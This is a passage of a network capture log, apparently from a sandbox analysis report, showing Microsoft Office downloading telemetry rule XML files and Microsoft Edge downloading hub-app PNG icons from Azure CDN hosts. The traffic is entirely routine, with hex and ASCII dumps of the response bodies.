2024-11-25 23:25:45 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.6	49856	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:44 UTC	192	OUT	GET /rules/rule120655v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:45 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:45 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7F164C3" x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232545Z-174f7845968xr5c2hC1EWRd0hn0000000bk000000000022g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:45 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.6	49857	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:44 UTC	192	OUT	GET /rules/rule120656v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:45 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:45 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT ETag: "0x8DC582BA48B5BDD" x-ms-request-id: f73eacfc-701e-0001-0b91-3fb110000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232544Z-174f7845968ljs8phC1EWRe6en0000000ub000000000063v x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:45 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
80	192.168.2.6	49859	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:45 UTC	192	OUT	GET /rules/rule120657v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:46 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:45 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT ETag: "0x8DC582B9FF95F80" x-ms-request-id: 417b9f3b-401e-0029-4091-3f9b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232545Z-174f7845968cdxdrhC1EWRg0en0000000uf00000000004u5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:46 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.6	49860	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:45 UTC	192	OUT	GET /rules/rule120658v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:46 UTC	471	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:45 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT ETag: "0x8DC582BB650C2EC" x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232545Z-174f7845968kdththC1EWRzvxn00000006w00000000004bu x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:46 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
82	192.168.2.6	49866	13.107.246.40	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:46 UTC	438	OUT	GET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:46 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:46 GMT Content-Type: image/png Content-Length: 1579 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT ETag: 0x8DBDCB5DE99522A x-ms-request-id: 4aa832c4-001e-0023-6091-3f07cc000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232546Z-174f7845968vqt9xhC1EWRgten0000000us00000000000tg Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:46 UTC	1579	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.6	49862	13.107.246.40	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:46 UTC	431	OUT	GET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:47 UTC	523	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:46 GMT Content-Type: image/png Content-Length: 1966 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT ETag: 0x8DBDCB5EC122A94 x-ms-request-id: b45380e2-b01e-0013-6191-3f5de6000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232546Z-174f7845968g6hv8hC1EWR1v2n00000002n00000000001rd Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:47 UTC	1966	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNntw<T:A-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.6	49863	13.107.246.40	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:46 UTC	433	OUT	GET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:46 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:46 GMT Content-Type: image/png Content-Length: 1751 Connection: close Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT ETag: 0x8DBCEA8D5AACC85 x-ms-request-id: ab62deda-d01e-0047-3391-3fb76c000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232546Z-174f7845968xlwnmhC1EWR0sv80000000ugg000000000145 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:46 UTC	1751	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.6	49865	13.107.246.40	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:46 UTC	433	OUT	GET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:47 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:47 GMT Content-Type: image/png Content-Length: 1427 Connection: close Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT ETag: 0x8DBDCB5EF021F8E x-ms-request-id: 6af15945-e01e-004f-6591-3fac1f000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232546Z-174f7845968glpgnhC1EWR7uec0000000ut00000000002nu Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:47 UTC	1427	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.6	49861	13.107.246.40	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:46 UTC	430	OUT	GET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:47 UTC	523	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:46 GMT Content-Type: image/png Content-Length: 2008 Connection: close Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT ETag: 0x8DBC9B5C0C17219 x-ms-request-id: 204c33f4-801e-0054-0391-3f828d000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232546Z-174f7845968kvnqxhC1EWRmf3g0000000dd0000000000363 Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 69316365 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:47 UTC	2008	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*\|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.6	49864	13.107.246.40	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:46 UTC	422	OUT	GET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1 Host: edgeassetservice.azureedge.net Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:47 UTC	516	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:46 GMT Content-Type: image/png Content-Length: 2229 Connection: close Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT ETag: 0x8DBD59359A9E77B x-ms-request-id: dea37d40-a01e-002e-5891-3fe8c0000000 x-ms-version: 2009-09-19 x-ms-lease-status: unlocked x-ms-blob-type: BlockBlob x-azure-ref: 20241125T232546Z-174f7845968qj8jrhC1EWRh41s0000000ugg0000000003nk Cache-Control: public, max-age=604800 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_MISS Accept-Ranges: bytes
2024-11-25 23:25:47 UTC	2229	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8 Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.6	49867	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:47 UTC	192	OUT	GET /rules/rule120659v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:47 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:47 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3EAF226" x-ms-request-id: 3ccb05f8-401e-0016-1b69-3f53e0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232547Z-174f7845968j6t2phC1EWRcfe80000000uw00000000002kp x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
